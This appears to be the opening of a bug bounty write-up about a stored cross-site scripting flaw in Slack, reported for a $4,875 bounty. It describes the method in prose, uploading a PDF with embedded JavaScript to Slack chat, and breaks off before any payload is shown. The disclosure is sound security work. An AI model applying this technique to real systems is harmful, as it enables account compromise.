Stored XSS on Slack, Bug Bounty

This was my first XSS related finding that was considered a high severity vulnerability on a bug bounty program. For finding this vulnerability I was paid a bounty of $4,875.

For general information about XSS vulnerabilities and their security impact I suggest you read the information in this link https://portswigger.net/web-security/cross-site-scripting.

Exploit:

The exploit of this vulnerability consists of uploading a PDF file with JavaScript code in it on the chat of Slack, if you clicked on it it opened on their PDF…